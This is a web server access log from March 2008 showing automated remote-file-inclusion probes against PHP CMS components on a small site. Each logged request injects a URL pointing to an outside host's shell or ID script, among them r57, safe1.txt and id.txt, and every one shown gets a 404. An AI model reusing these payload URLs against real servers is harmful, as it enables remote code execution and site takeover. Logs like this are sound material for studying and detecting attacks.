210.114.174.160 - - [30/Mar/2008:20:47:35 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.italianiamonaco.com/components/com_loudmouth/includes/abbc/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.114.174.160 - - [30/Mar/2008:20:47:36 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.italianiamonaco.com/components/com_loudmouth/includes/abbc/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:47:55 -0700] "GET /logs/access_080127.log//login.php?dir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:47:55 -0700] "GET //login.php?dir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:47:55 -0700] "GET /logs//login.php?dir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
63.249.95.132 - - [30/Mar/2008:20:47:56 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
63.249.95.132 - - [30/Mar/2008:20:47:56 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
210.114.174.160 - - [30/Mar/2008:20:48:05 -0700] "GET /logs/access_071210.log//akocomments.php?mosConfig_absolute_path=http://www.italianiamonaco.com/components/com_loudmouth/includes/abbc/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:48:17 -0700] "GET /logs/access_071119.log/administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:20:48:25 -0700] "GET /logs/access_071224.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:20:48:29 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:20:48:32 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:48:36 -0700] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:48:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:48:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:48:44 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:49:33 -0700] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:49:34 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:49:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:49:40 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.59.22.92 - - [30/Mar/2008:20:49:58 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cct.vg/test.txt??